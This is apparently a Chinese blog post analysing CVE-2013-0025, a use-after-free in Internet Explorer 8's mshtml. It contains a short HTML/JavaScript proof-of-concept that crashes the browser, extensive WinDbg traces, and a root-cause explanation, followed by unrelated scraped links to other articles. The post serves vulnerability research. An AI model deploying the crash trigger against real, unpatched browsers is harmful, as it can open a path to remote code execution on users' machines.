Microsoft IE ‘SLayoutRun’释放后重用漏洞(CNNVD-201302-197)

Microsoft Internet Explorer是微软Windows操作系统中默认捆绑的WEB浏览器。 
        Microsoft Internet Explorer 8中的SLayoutRun中存在释放后重用漏洞。通过特制网站触发对已删除对象的访问,远程攻击者可利用该漏洞执行任意代码。

测试环境

Windows7

IE 8.0.7600.16385

poc代码如下

<!doctype html>

<html>

<head></head>

<body>

<p> </p>

<script>

Math.tan(,);

document.body.style.whiteSpace = "pre-line";

setTimeout("document.body.innerHTML = 'i'",);

</script>

</body>

</html>
:> r

eax=1ca0afb0 ebx=0411e8d8 ecx= edx= esi=1ceaefd8 edi=1ceaefd8

eip= esp=0411e84c ebp=0411e84c iopl=         nv up ei pl nz na pe nc

cs=001b  ss=  ds=  es=  fs=003b  gs=             efl=

mshtml!ElementWantsNotification+0x5:

 f7461c00000008  test    dword ptr [esi+1Ch],8000000h ds::1ceaeff4=????????
 :> !heap -p -a esi

     address 07620fd8 found in

     _DPH_HEAP_ROOT @ 1a1000

     in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)

                                     75e06e8:

     6fcd90b2 verifier!AVrfDebugPageHeapFree+0x000000c2

      ntdll!RtlDebugFreeHeap+0x0000002f

     77857aca ntdll!RtlpFreeHeap+0x0000005d

     77822d68 ntdll!RtlFreeHeap+0x00000142

     771af1ac kernel32!HeapFree+0x00000014

     6a2a930e mshtml!operator delete[]+0x00000016

     6a318c8d mshtml!CParaElement::`vector deleting destructor'+0x0000001f

     6a2b7dd0 mshtml!CBase::SubRelease+0x00000022

     6a310fdf mshtml!CElement::PrivateExitTree+0x00000011

     6a1f5b42 mshtml!CMarkup::SpliceTreeInternal+0x00000083

     6a1f6ff9 mshtml!CDoc::CutCopyMove+0x000000ca

     6a1f6f39 mshtml!CDoc::Remove+0x00000018

     6a1f6f17 mshtml!RemoveWithBreakOnEmpty+0x0000003a

     6a1f7aef mshtml!InjectHtmlStream+0x00000191

     6a1f793e mshtml!HandleHTMLInjection+0x0000005c

     6a1f71fa mshtml!CElement::InjectInternal+0x00000307

     6a1f704a mshtml!CElement::InjectCompatBSTR+0x00000046

     6a1f988c mshtml!CElement::put_innerHTML+0x00000040

     6a3372d6 mshtml!GS_BSTR+0x000001ac

     6a32235c mshtml!CBase::ContextInvokeEx+0x000005dc

     6a32c75a mshtml!CElement::ContextInvokeEx+0x0000009d

     6a32c79a mshtml!CInput::VersionedInvokeEx+0x0000002d

     6a2d3104 mshtml!PlainInvokeEx+0x000000eb

     6c75a22a jscript!IDispatchExInvokeEx2+0x00000104

     6c75a175 jscript!IDispatchExInvokeEx+0x0000006a

     6c75a3f6 jscript!InvokeDispatchEx+0x00000098

     6c75a4a0 jscript!VAR::InvokeByName+0x00000139

     6c76d8c8 jscript!VAR::InvokeDispName+0x0000007d

     6c759c0e jscript!CScriptRuntime::Run+0x0000208d

     6c765c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce

     6c765bfb jscript!ScrFncObj::Call+0x0000008d

     6c765e11 jscript!CSession::Execute+0x0000015f

重利用:

1:023> r

eax=1ca0afb0 ebx=0411e8d8 ecx=00000000 edx=10001000 esi=1ceaefd8 edi=1ceaefd8

eip=65477386 esp=0411e84c ebp=0411e84c iopl=0         nv up ei pl nz na pe nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206

mshtml!ElementWantsNotification+0x5:

65477386 f7461c00000008  test    dword ptr [esi+1Ch],8000000h ds:0023:1ceaeff4=????????

分配:

1:021> g

Breakpoint 2 hit

eax=077e6fd8 ebx=07cfefd0 ecx=7721349f edx=00000000 esi=077e6fd8 edi=07d59f70

eip=6830480f esp=0440f4a4 ebp=0440f4b0 iopl=0         nv up ei pl nz na pe nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206

mshtml!CElement::CElement:

6830480f 8bff            mov     edi,edi

1:021> dd eax

077e6fd8  00000000 00000000 00000000 00000000

077e6fe8  00000000 00000000 00000000 00000000

077e6ff8  00000000 00000000 ???????? ????????

077e7008  ???????? ???????? ???????? ????????

077e7018  ???????? ???????? ???????? ????????

077e7028  ???????? ???????? ???????? ????????

077e7038  ???????? ???????? ???????? ????????

077e7048  ???????? ???????? ???????? ????????

1:021> kv

ChildEBP RetAddr  Args to Child

0440f4a0 68322dbf 0000004d 05832680 0440f4c4 mshtml!CElement::CElement

0440f4b0 68327e98 0000004d 05832680 07cfef08 mshtml!CBlockElement::CBlockElement+0x12

0440f4c4 68304be9 07d59f70 05832680 0440f500 mshtml!CParaElement::CreateElement+0x26

0440f4f0 68308961 0440f524 07a04f30 00000000 mshtml!CreateElement+0x43

0440f51c 68306e93 00000000 071fafb0 07d59f70 mshtml!CHtmParse::ParseBeginTag+0xe3

0440f538 683075c9 7710ef76 071fafb0 071fafb0 mshtml!CHtmParse::ParseToken+0x82

0440f5e0 682f78e8 071fafb0 0af194c6 0af194c6 mshtml!CHtmPost::ProcessTokens+0x237

0440f6a4 682f8a99 0af194c6 00000000 071fafb0 mshtml!CHtmPost::Exec+0x221

0440f6bc 682f89fd 0af194c6 00000000 071fafb0 mshtml!CHtmPost::Run+0x15

0440f6dc 682f7c66 057e4d58 0af194c6 071fafb0 mshtml!PostManExecute+0x1fb

0440f6f8 683113f6 00000001 00000007 0440f718 mshtml!PostManResume+0xf7

0440f708 682f53fc 07d06f98 071fafb0 0440f74c mshtml!CHtmPost::OnDwnChanCallback+0x10

0440f718 683994b2 07d06f98 00000000 057e4d58 mshtml!CDwnChan::OnMethodCall+0x19

0440f74c 683837f7 0440f7e8 00008002 00000000 mshtml!GlobalWndOnMethodCall+0xff

0440f76c 76c686ef 004c0314 00000008 00000000 mshtml!GlobalWndProc+0x10c

0440f798 76c68876 68371de3 004c0314 00008002 USER32!InternalCallWinProc+0x23

0440f810 76c689b5 00000000 68371de3 004c0314 USER32!UserCallWinProcCheckWow+0x14b (FPO: [Non-Fpo])

0440f870 76c68e9c 68371de3 00000000 0440f8f8 USER32!DispatchMessageWorker+0x35e (FPO: [Non-Fpo])

0440f880 6ea704a6 0440f898 00000000 017ecf58 USER32!DispatchMessageW+0xf (FPO: [Non-Fpo])

0440f8f8 6ea80446 04fba808 00000000 02f40ff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x452 (FPO: [Non-Fpo])

释放:

(68327ec0)   mshtml!CParaElement::`vftable'   |  (68328169)   mshtml!CStyleSelector::SetSelectorPart

Exact matches:

    mshtml!CParaElement::`vftable' = <no type information>

ChildEBP RetAddr  Args to Child

0438eddc 68387db6 0791cf30 00000000 0438ef48 mshtml!CBase::SubRelease (FPO: [0,0,0])

0438edec 683e0fdf 07f2afd8 00000000 682c660e mshtml!CBase::PrivateRelease+0x3c

0438edf8 682c660e 0791cf30 00000000 00000018 mshtml!CElement::PrivateExitTree+0x11 (FPO: [0,0,1])

0438ef48 682c5b42 0438f06c 0438efbc 00000000 mshtml!CSpliceTreeEngine::RemoveSplice+0x841

0438f028 682c6ff9 0438f060 0438f06c 00000000 mshtml!CMarkup::SpliceTreeInternal+0x83

0438f078 682c6f39 0438f220 0438f25c 00000001 mshtml!CDoc::CutCopyMove+0xca

0438f094 682c6f17 0438f220 0438f25c 00000000 mshtml!CDoc::Remove+0x18

0438f0ac 682c7aef 0438f25c 07b70e74 683791b8 mshtml!RemoveWithBreakOnEmpty+0x3a

0438f1a8 682c793e 0438f220 0438f25c 0438f1d0 mshtml!InjectHtmlStream+0x191

0438f1e4 682c71fa 0438f220 0438f25c 00000002 mshtml!HandleHTMLInjection+0x5c

0438f29c 682c704a 00000000 00000001 07b70e74 mshtml!CElement::InjectInternal+0x307

0438f2b8 682c988c 05680fd0 00000000 00000001 mshtml!CElement::InjectCompatBSTR+0x46

0438f2d8 684072d6 00680fd0 07b70e74 07b7ffd0 mshtml!CElement::put_innerHTML+0x40

0438f308 683f235c 05680fd0 07b7ffd0 07039fd8 mshtml!GS_BSTR+0x1ac

0438f37c 683fc75a 05680fd0 80010402 00000002 mshtml!CBase::ContextInvokeEx+0x5dc

0438f3cc 683fc79a 05680fd0 80010402 00000002 mshtml!CElement::ContextInvokeEx+0x9d

0438f3f8 683a3104 05680fd0 80010402 00000002 mshtml!CInput::VersionedInvokeEx+0x2d

0438f44c 6bcfa22a 06b12fd8 80010402 00000002 mshtml!PlainInvokeEx+0xeb

0438f488 6bcfa175 07328d10 80010402 00000409 jscript!IDispatchExInvokeEx2+0x104

0438f4c4 6bcfa3f6 07328d10 00000409 00000004 jscript!IDispatchExInvokeEx+0x6a

(96c.c6c): Access violation - code c0000005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=07912fb0 ebx=0438edb8 ecx=00000000 edx=10001000 esi=07f2afd8 edi=07f2afd8

eip=68387386 esp=0438ed2c ebp=0438ed2c iopl=0         nv up ei pl nz na pe nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206

mshtml!ElementWantsNotification+0x5:

68387386 f7461c00000008  test    dword ptr [esi+1Ch],8000000h ds:0023:07f2aff4=????????

尝试对应到js语句中

修改POC

<!doctype html>

<html>

<head></head>

<body>

<p> </p>

<script>

Math.tan(2,3);

document.body.style.whiteSpace = "pre-line";

Math.sin(0);

setTimeout("document.body.innerHTML = 'i'",100);

Math.cos(0);

</script>

</body>

</html>

UAF元素CParaElement是由

<p> </p>

导致创建的

1:020> g

Breakpoint 1 hit

eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8

eip=6be7d8c0 esp=0423ecf4 ebp=0423ed30 iopl=0         nv up ei pl nz ac po nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212

jscript!tan:

6be7d8c0 ff258010e56b    jmp     dword ptr [jscript!_imp__tan (6be51080)] ds:0023:6be51080={msvcrt!tan (758dde34)}

1:020> g

Breakpoint 3 hit

eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8

eip=6be7d711 esp=0423ecf4 ebp=0423ed30 iopl=0         nv up ei pl nz ac po nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212

jscript!sin:

6be7d711 ff256810e56b    jmp     dword ptr [jscript!_imp__sin (6be51068)] ds:0023:6be51068={msvcrt!sin (758d8aea)}

1:020> g

Breakpoint 2 hit

eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8

eip=6be7d67f esp=0423ecf4 ebp=0423ed30 iopl=0         nv up ei pl nz ac po nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212

jscript!cos:

6be7d67f ff259010e56b    jmp     dword ptr [jscript!_imp__cos (6be51090)] ds:0023:6be51090={msvcrt!cos (758d8ace)}

1:020> g

eax=06cd5b88 ebx=00000000 ecx=0792afd8 edx=686f5100 esi=07020fd0 edi=00000384

eip=68387d27 esp=0423df4c ebp=0423df60 iopl=0         nv up ei pl nz na pe nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206

mshtml!CBase::SubRelease:

68387d27 834108f8        add     dword ptr [ecx+8],0FFFFFFF8h ds:0023:0792afe0=00000010

1:020> g

eax=06cd5b88 ebx=00000000 ecx=0792afd8 edx=686f5100 esi=07020fd0 edi=00000384

eip=68387d27 esp=0423df4c ebp=0423df60 iopl=0         nv up ei pl nz na pe nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206

mshtml!CBase::SubRelease:

68387d27 834108f8        add     dword ptr [ecx+8],0FFFFFFF8h ds:0023:0792afe0=00000010

1:020> g

eax=00000043 ebx=00000000 ecx=0792afd8 edx=00000000 esi=0792afd8 edi=00000000

eip=68387d27 esp=0423e8f8 ebp=0423e904 iopl=0         nv up ei pl nz na pe nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206

mshtml!CBase::SubRelease:

68387d27 834108f8        add     dword ptr [ecx+8],0FFFFFFF8h ds:0023:0792afe0=0000000a

1:020> g

(6b0.f20): Access violation - code c0000005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=079d2fb0 ebx=0423e8d0 ecx=00000000 edx=10001000 esi=0792afd8 edi=0792afd8

eip=68387386 esp=0423e844 ebp=0423e844 iopl=0         nv up ei pl nz na pe nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206

mshtml!ElementWantsNotification+0x5:

68387386 f7461c00000008  test    dword ptr [esi+1Ch],8000000h ds:0023:0792aff4=????????

释放可以根据回溯中的CElement::put_innerHTML分析得出是POC的document.body.innerHTML = 'i'所导致

没有明显的js语句对应于重用

漏洞原因分析

这个漏洞的成因在于CTreeNode没有被释放存在有CParaElement对象的悬垂指针,而CTreeNode没有被释放的原因在于被CTreeDataPos对象错误的引用。

CVE-2013-0025的更多相关文章

  1. 应用安全-软件安全-漏洞CVE整理

    jira ssrf CVE-2019-8451 url = url + '/plugins/servlet/gadgets/makeRequest?url=' + host + '@www.baidu ...

  2. 2013 Asia Changsha Regional Contest---Josephina and RPG(DP)

    题目链接 http://acm.hdu.edu.cn/showproblem.php?pid=4800 Problem Description A role-playing game (RPG and ...

  3. SharePoint 2013: A feature with ID has already been installed in this farm

    使用Visual Studio 2013创建一个可视web 部件,当右击项目选择"部署"时报错: "Error occurred in deployment step ' ...

  4. Visual Studio 2013 添加一般应用程序(.ashx)文件到SharePoint项目

    默认,在用vs2013开发SharePoint项目时,vs没有提供一般应用程序(.ashx)的项目模板,本文解决此问题. 以管理员身份启动vs2013,创建一个"SharePoint 201 ...

  5. SharePoint 2013 create workflow by SharePoint Designer 2013

    这篇文章主要基于上一篇http://www.cnblogs.com/qindy/p/6242714.html的基础上,create a sample workflow by SharePoint De ...

  6. Install and Configure SharePoint 2013 Workflow

    这篇文章主要briefly introduce the Install and configure SharePoint 2013 Workflow. Microsoft 推出了新的Workflow ...

  7. SharePoint 2013 configure and publish infopth

    This article will simply descript how to configure and publish a InfoPath step by step. Note: To con ...

  8. TFS 2013 培训视频

    最近给某企业培训了完整的 TFS 2013 系列课程,一共四天. 下面是该课程的内容安排: 项目管理     建立项目     成员的维护     Backlog 定义     任务拆分     迭代 ...

  9. Visual Studio 2013 Ultimate因为CodeLens功能导致Microsoft.Alm.Shared.Remoting.RemoteContainer.dll高CPU占用率的折中解决方案

    1.为什么Microsoft.Alm.Shared.Remoting.RemoteContainer.dll的CPU占用率以及内存使用率会那么高? 在Visual Studio 2013 Ultima ...

  10. 沙盒解决方案解决SharePoint 2013 以其他身份登陆的问题

    众所周知,SharePoint 2013没有像SharePoint 2010那样有一个叫"以其他身份登录"的菜单项. 当然解决方案也很多,比如你可以直接修改Welcome.ascx ...

随机推荐

  1. 【题解】新型城市化 HAOI2017 网络流 二分图最大匹配 强连通分量

    Prelude 好,HAOI2017终于会做一道题了! 传送到洛谷:→_→ 传送到LOJ:←_← 本篇博客链接:(●'◡'●) Solution 首先要读懂题. 考场上我是这样想的QAQ. 我们把每个 ...

  2. ubuntu下访问其他盘出现挂在错误解决办法

    Error mounting /dev/sda5 at /media Linux下不能进入windows的NTFS分区之挂载错误问题 电 脑安装了win8,后在另一个分区(在win8下未分配空间)安装 ...

  3. Python3 笨方法 练习41(面向对象)详解及运行结果

    #无尽模式训练你,检验所掌握的面向对象的单词和短语. import random from urllib.request import urlopen import sys WORD_URL = &q ...

  4. filebeat过滤

    合并多行以[为头 multiline:pattern: '^\['negate: truematch: after ------------------------------------------ ...

  5. springboot 以jar方式在linux后台运行

    linux命令如下: nohup java -jar 自己的springboot项目.jar >日志文件名.log 2>&1 & 命令解释: nohup:不挂断地运行命令, ...

  6. [译]Quartz.NET 框架 教程(中文版)2.2.x 之第四课 更多关于Triggers

    第四课 更多关于Triggers 跟作业任务类似,触发器也非常容易使用,但是在你能够充分掌握Quartz之前,你需要知道并理解许多触发器的客户化的参数.前面已经提到过,有许多不同类型的触发器供你选择, ...

  7. 《设计模式》-原则五:合成/聚合复用原则(CARP)

    这个也好理解 ,这个合成/聚合复用原则指的是在一个新的对象里面使用一些已有的对象,使其成为新对象的一部分.新对象通过委派达到复用已有功能的效果. 说到这里要讲提及到“Has-A” 和“Is-A”的区别 ...

  8. C 语言中指针初始化为字符串常量 不可通过该指针修改其内容

    char b[] = "hello"; 则“hello”存于栈中,因为定义的是一个数组. char *b = "hello"; 则"hello&quo ...

  9. 七牛云 上传图片 https 修改Nginx 注意事项

    仅在这记录下,今天的事情. 问题出自于Nginx 设置http 强制跳转 https设置 1.上午,出于某些需求,我将服务器Nginx 设置http 强行跳转 https server { liste ...

  10. 关于getsockname()/getpeername()函数第一次被调用得到0.0.0.0结果的说明

    最近阅读UNIX网络编程第四章时,书本末尾介绍了两个函数getsockname()和getpeername(),可以用于获取服务器端和客户端的IP地址与端口,原本很简单的两个函数,过一眼即明白函数的用 ...